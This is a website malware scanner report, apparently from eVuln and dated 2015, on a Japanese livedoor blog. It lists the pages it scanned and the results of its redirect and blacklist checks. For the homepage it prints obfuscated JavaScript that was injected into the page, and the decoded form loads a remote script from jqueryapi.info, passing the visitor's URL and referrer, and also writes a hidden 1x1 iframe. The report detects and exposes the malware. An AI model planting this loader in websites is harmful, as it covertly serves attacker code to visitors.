New scan:

Malware Scanner report for ffcalrev16.dreamlog.jp

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/16
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ffcalrev16.dreamlog.jp/
200 OK
Content-Length: 34955
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var O00='KkSKpcCfngCdpxGcz5yJpBXY5JXZ1Fna8t2b89mZulGfjJ3c0V2Z8ZWZyxHZslGaDRmblBHchxHdwlmcjNHflRXaydHfsJXd8VGchN2cl5Wd8NmczxHZhVGa8NmczBjM8Rnbl1WZsVUZ0FWZyNGfhJXdtd2bsJGfwRHdox3d3dHfyVmcyVmZlJHfwRHdoJjM8VWbh50ZhRVeCNHduVWblxWR0V2Z8BjMywXZtFmcml2QzwHa0RWa3BjM8xXQzwHTSVFf0h2ZpVGawIDft92Y8R0M8FDbx8Ff8JXZkJ3biVWbhJnZwIDflBXYjNXZfx3TPBzX8N0M8Rnbl52bw12bDlkUVVGZvNmblxnchZHfyYDf4kDfxQDf05WZtV3YvRGfxIjM8V0M8VWbhJnZpxHbhZXZ8dmbpJHdT9Gd8RnbJV2cyFGc8ZzM8VGZvNkchh2Qt9mcmxXNzwHdpxGczx3dl5GfwhXRnVmU8dmbpJHdTxX
... 2094 bytes are skipped ...
I.indexOf(data.charAt(i++));h4=O0IlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function O0I(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(_1I1(O0I(O00)));

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1O(1B(p,a,c,k,e,d){e=1B(c){1A(c<a?\'\':e(1M(c/a)))+((c=c%a)>1J?1F.1K(c+29):c.1N(1L))};1C(!\'\'.1D(/^/,1F)){1E(c--){d[e(c)]=k[c]||e(c)}k=[1B(e){1A d[e]}];e=1B(){1A\'\\\\w+\'};c=1};1E(c--){1C(k[c]){p=p.1D(1H 1G(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}1A p}(\'M(F(p,a,c,k,e,d)
... 7417 bytes are skipped ...
0];_0OO.appendChild(_1l1);document.write(unescape(_escape));
var _escape='%3Ciframe%20width%3D%221%22%20height%3D%221%22%20src%3D%22http%3A//www.blogmura.com/%22%20frameborder%3D%220%22%3E%3C/iframe%3E';var _1l1=document.createElement('script');_1l1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _0OO=document.getElementsByTagName('head')[0];_0OO.appendChild(_1l1);document.write(unescape(_escape));

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.G

http://parts.blog.livedoor.jp/js/c2.js
200 OK
Content-Length: 4781
Content-Type: application/x-javascript
clean
http://parts.blog.livedoor.jp/js/smartphone.js?v=20131007
200 OK
Content-Length: 2112
Content-Type: application/x-javascript
clean
http://ffcalrev16.dreamlog.jp/settings/header.js
200 OK
Content-Length: 0
Content-Type: application/javascript
clean
http://ffcalrev16.dreamlog.jp/settings/ad.js
200 OK
Content-Length: 72
Content-Type: application/javascript
clean
http://ffcalrev16.dreamlog.jp/archives/33847058.html
200 OK
Content-Length: 24448
Content-Type: text/html
clean
http://parts.blog.livedoor.jp/js/emoji.js
200 OK
Content-Length: 48466
Content-Type: application/x-javascript
clean
http://parts.blog.livedoor.jp/js/misc.js
200 OK
Content-Length: 3557
Content-Type: application/x-javascript
clean
http://parts.blog.livedoor.jp/js/related_articles.js
200 OK
Content-Length: 3330
Content-Type: application/x-javascript
clean
http://ffcalrev16.dreamlog.jp/archives/33527796.html
200 OK
Content-Length: 25068
Content-Type: text/html
clean
http://ffcalrev16.dreamlog.jp/archives/33424945.html
200 OK
Content-Length: 25045
Content-Type: text/html
clean
http://ffcalrev16.dreamlog.jp/archives/33321363.html
200 OK
Content-Length: 24715
Content-Type: text/html
clean
http://ffcalrev16.dreamlog.jp/archives/33222406.html
200 OK
Content-Length: 24814
Content-Type: text/html
clean
http://ffcalrev16.dreamlog.jp/archives/33075139.html
200 OK
Content-Length: 24744
Content-Type: text/html
clean
http://ffcalrev16.dreamlog.jp/archives/32753175.html
200 OK
Content-Length: 24848
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ffcalrev16.dreamlog.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Jun 2015 11:28:18 GMT
Server: gazelle
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="BUS OUR PHY STP ADM CUR DEV PSA PSD"
Set-Cookie: ldblog_u=78.158.11.226.1434367698250534; path=/; expires=Sun, 13-Sep-15 11:28:18 GMT
X-Framework: JP/4.01
Second query (visit from search engine):
GET / HTTP/1.1
Host: ffcalrev16.dreamlog.jp
Referer: http://www.google.com/search?q=ffcalrev16.dreamlog.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ffcalrev16.dreamlog.jp

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ffcalrev16.dreamlog.jp/

Result: ffcalrev16.dreamlog.jp is not infected or malware details are not published yet.